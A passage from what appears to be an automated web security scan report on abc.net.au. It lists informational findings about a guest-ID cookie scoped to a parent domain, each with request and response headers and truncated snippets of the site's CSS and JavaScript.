User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 02 Feb 2010 00:14:29 GMT
ETag: "13e5575-474-fc3ca340"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 1140
Cache-Control: max-age=54192
Expires: Thu, 08 Sep 2011 05:17:25 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853217; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

#latest_media {
margin-bottom: 20px;
}

#latest_media .title h2 {
padding: 0 0 5px 0;
}

#latest_media .tabslm {
width: 220px;
border-bottom: 4px solid #396789;
}

#latest_media .
...[SNIP]...

8.63. http://www.abc.net.au/local/global_css/common_modules/m60_login.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/common_modules/m60_login.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/common_modules/m60_login.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 22 Jun 2011 00:57:53 GMT
ETag: "c8b8f3-b6a-754ee640"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 2922
Cache-Control: max-age=29877
Expires: Wed, 07 Sep 2011 22:32:10 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853234; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

/* @import url("http://www.abc.net.au/pluck/demos/login/screen.css"); */

#abc_pluck-error {
   color: #EF461C;
}    

#abc_pluck-login, #my-login {
   width: 220px;
   margin: 0;
}

#abc_pluck-logi
...[SNIP]...

8.64. http://www.abc.net.au/local/global_css/common_modules/river_of_content_m20.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/common_modules/river_of_content_m20.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/common_modules/river_of_content_m20.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 04 Aug 2011 04:12:02 GMT
ETag: "123fcc1-4721-2ed1a880"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 18209
Cache-Control: max-age=68101
Expires: Thu, 08 Sep 2011 09:09:14 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853184; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

/* Temp - New defaults - update older styles */

.river_of_content .image {
   width: 100px;
   min-height: 10px;
   padding: 0 10px 0 0;
}

.river_of_content .image img {
   width: 100px;
}

.riv
...[SNIP]...

8.65. http://www.abc.net.au/local/global_css/common_modules/site_search_m3.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/common_modules/site_search_m3.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/common_modules/site_search_m3.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 19 May 2011 05:14:54 GMT
ETag: "13e5586-40f-15ddef80"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Cache-Control: max-age=24849
Expires: Wed, 07 Sep 2011 21:08:22 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Content-Length: 1039
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853181; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

/* Search Function */

.search {
   width:220px;
   background: url(../../global_img/generic/bg_searchFunction.png) no-repeat bottom;
}

.search h3 {
   padding:8px 8px 5px;
   background: url(../../
...[SNIP]...

8.66. http://www.abc.net.au/local/global_css/common_modules/top_stories_m14.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/common_modules/top_stories_m14.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/common_modules/top_stories_m14.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 19 May 2011 03:12:20 GMT
ETag: "17ec439-c2c-5f88cd00"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 3116
Cache-Control: max-age=21595
Expires: Wed, 07 Sep 2011 20:14:07 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852891; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

/* Top stories module */

.top_stories {
   background: #fff;
   width: 700px;
   padding-bottom: 10px;
   text-align: left;
   overflow: hidden;
}

.top_stories h2 {
   padding: 0 0 10px 0;
   font-siz
...[SNIP]...

8.67. http://www.abc.net.au/local/global_css/news/styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/news/styles.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/news/styles.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 03 May 2011 03:47:45 GMT
ETag: "11d9ee7-e7-bbba40"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 231
Cache-Control: max-age=21717
Expires: Wed, 07 Sep 2011 20:16:09 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852896; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

.river_of_content h2 {
   display: none;
}

.news #col1 p.description {
   margin: 10px;
   color: #666666;
}

.news .about .story {
   left:-30px;
   overflow:hidden;
   padding: 0 0 0 30px;
   positi
...[SNIP]...

8.68. http://www.abc.net.au/local/global_css/palettes/generic.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/palettes/generic.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/palettes/generic.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 08 Sep 2010 02:39:31 GMT
ETag: "1259a3d-61a-6c525ec0"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Cache-Control: max-age=24848
Expires: Wed, 07 Sep 2011 21:08:20 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Content-Length: 1562
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852911; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

.gen_color1 {color: #1c3f5e;}
.gen_color2 {color: #2273b1;}
.gen_color3 {color: #dcf0ff;}
.gen_color4 {color: #4b483f;}
.gen_color5 {color: #746d61;}
.gen_color6 {color: #000000;}
.gen_color7 {c
...[SNIP]...

8.69. http://www.abc.net.au/local/global_css/palettes/paletteA.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/palettes/paletteA.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/palettes/paletteA.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 04 May 2011 04:56:45 GMT
ETag: "1259a3f-518-15567d40"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Cache-Control: max-age=70010
Expires: Thu, 08 Sep 2011 09:41:02 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Content-Length: 1304
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852861; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

.paletteA .color1 {color: #434983;}
.paletteA .color2 {color: #4851aa;}
.paletteA .color3 {color: #704694;}
.paletteA .color4 {color: #c1aed1;}
.paletteA .color5 {color: #f5effa;}
.paletteA .colo
...[SNIP]...

8.70. http://www.abc.net.au/local/global_css/styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/styles.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/styles.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 15 Jul 2011 08:22:41 GMT
ETag: "1956216-3b90-5a631640"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Cache-Control: max-age=24847
Expires: Wed, 07 Sep 2011 21:08:19 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Content-Length: 15248
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852838; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au


#BigPictureMode img {
   float: right ;
   margin-bottom:5px;
   width:185px;
   padding: 5px 5px 5px 0;
}

a {
   text-decoration: none;
}

a:hover {
   text-decoration: underline;
}

ul {
   m
...[SNIP]...

8.71. http://www.abc.net.au/local/global_css/template/styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/template/styles.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/template/styles.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 31 Mar 2011 03:37:17 GMT
ETag: "33bbf3-379-289d540"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 889
Cache-Control: max-age=24847
Expires: Wed, 07 Sep 2011 21:08:19 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852869; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

body {font-size:80%;}

#access_keys {padding: 5px 0; position: absolute; left: -5000px; width: 100%; background: #FFFFFF}

#access_keys a {
   margin: 0 10px;
}

/* Module styles */

.module
...[SNIP]...

8.72. http://www.abc.net.au/local/global_css/yaml/central_draft.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/yaml/central_draft.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/yaml/central_draft.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 30 Mar 2011 05:24:55 GMT
ETag: "2fe47e-620-659fb7c0"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 1568
Cache-Control: max-age=24847
Expires: Wed, 07 Sep 2011 21:08:19 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852839; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

@charset "UTF-8";
@import url(/local/global_css/yaml/core/slim_base.css);
html #page_margins div{float:left}
#page{width:1000px}
#banner{width:100%}
body{text-align:center; margin:0; padding:0;
...[SNIP]...

8.73. http://www.abc.net.au/local/global_css/yaml/core/slim_base.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/yaml/core/slim_base.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/yaml/core/slim_base.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 02 Feb 2010 00:14:39 GMT
ETag: "2fe484-7b9-fcd539c0"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Cache-Control: max-age=24852
Expires: Wed, 07 Sep 2011 21:08:25 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Content-Length: 1977
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853497; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

@charset "UTF-8";
/* "Yet Another Multicolumn Layout" v3.0.6 (c) by Dirk Jesse (http://www.yaml.de)
* $Revision: 202 $ $Date: 2008-06-07 14:29:18 +0200 (Sa, 07 Jun 2008) $ */
@media all {
*{margin
...[SNIP]...

8.74. http://www.abc.net.au/local/global_scripts/contribute/functions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_scripts/contribute/functions.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_scripts/contribute/functions.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 27 Jul 2011 02:45:56 GMT
ETag: "f28660-740f-c2bc100"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 29711
Cache-Control: max-age=6707
Expires: Wed, 07 Sep 2011 16:06:00 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853252; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

var yourLogin;
yourLogin = {};
var yourGallery = [];

function getCookie(c_name)
{
if (document.cookie.length>0)
{
c_start=document.cookie.indexOf(c_name + "=");
if (c_start!=-1)
{
...[SNIP]...

8.75. http://www.abc.net.au/local/global_scripts/general.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_scripts/general.min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_scripts/general.min.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 16 May 2011 03:01:47 GMT
ETag: "371668-14d-e047dcc0"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 333
Cache-Control: max-age=57421
Expires: Thu, 08 Sep 2011 06:11:14 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853288; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

$(document).ready(function(){var clickstatus="open";$(".bc_icon").click(function(){$(".bc_wrap").toggle("slow");$(".bc_icon").toggleClass("active");if(clickstatus==="open"){$(".bc_icon").attr("title",
...[SNIP]...

8.76. http://www.abc.net.au/local/includes/scripts/city_include.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/includes/scripts/city_include.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/includes/scripts/city_include.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 13 Dec 2010 06:04:30 GMT
ETag: "7570aa-1009-7a2a3780"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 4105
Cache-Control: max-age=57416
Expires: Thu, 08 Sep 2011 06:11:09 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853254; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

var LinksLimit = 4;
LinksLimit = parseInt(LinksLimit);

// Specify cookie name.
//var CookieName = "ABCRegion";
var CookieName = "ABCGuestID";

var DaysToLive = 0;
DaysToLive = parseInt(DaysTo
...[SNIP]...

8.77. http://www.abc.net.au/local/includes/scripts/jquery/plugins/jquery.tools.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/includes/scripts/jquery/plugins/jquery.tools.min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/includes/scripts/jquery/plugins/jquery.tools.min.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 21 Nov 2010 04:24:36 GMT
ETag: "197d20c-e56-8462c900"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=9635
Expires: Wed, 07 Sep 2011 16:54:48 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Content-Length: 3670
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853243; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

/*
* jquery.tools 1.0.2 - The missing UI library
*
* [tools.tabs-1.0.1]
*
* Copyright (c) 2009 Tero Piirainen
* http://flowplayer.org/tools/
*
* Dual licensed under MIT and GPL 2+ li
...[SNIP]...

8.78. http://www.abc.net.au/local/includes/scripts/tabs_latest_media.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/includes/scripts/tabs_latest_media.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/includes/scripts/tabs_latest_media.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 22 Dec 2009 01:26:05 GMT
ETag: "197d1ff-88-16f6a540"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 136
Cache-Control: max-age=12700
Expires: Wed, 07 Sep 2011 17:45:53 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853287; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

$(function() {
   // setup ul.tabs to work as tabs for each div directly under div.panes
   $("ul.tabslm").tabs("div.paneslm > div");
});

8.79. http://www.abc.net.au/res/abc/styles/screen.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /res/abc/styles/screen.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /res/abc/styles/screen.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 14 Mar 2011 01:34:07 GMT
ETag: "1231186-1618-4ec201c0"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 5656
Cache-Control: max-age=54776
Expires: Thu, 08 Sep 2011 05:27:08 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852841; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au


/* --- ABC Nav and Footer styles --- */
/* created by: Geoff Pack, Mar 2009 */
/* last modified: March 2011 */


/* --- ABC Nav --- */

#abcNav {margin:0; padding:0; min-width:10
...[SNIP]...

8.80. http://www.abc.net.au/res/libraries/abcjs/abc.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /res/libraries/abcjs/abc.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /res/libraries/abcjs/abc.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 18 Aug 2010 00:51:49 GMT
ETag: "feb3f2-1533-787d3340"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=67469
Expires: Thu, 08 Sep 2011 08:58:41 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Content-Length: 5427
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852837; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

/**
* @namespace
* @description All general ABC methods and functionality should be placed
*                within this namespace.
* @version    0.0.1 March 2010
* @author        ABC Innovation
*
*/

var
...[SNIP]...

8.81. http://www.abc.net.au/res/libraries/jquery/jquery-latest.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /res/libraries/jquery/jquery-latest.min.js

Issue detail

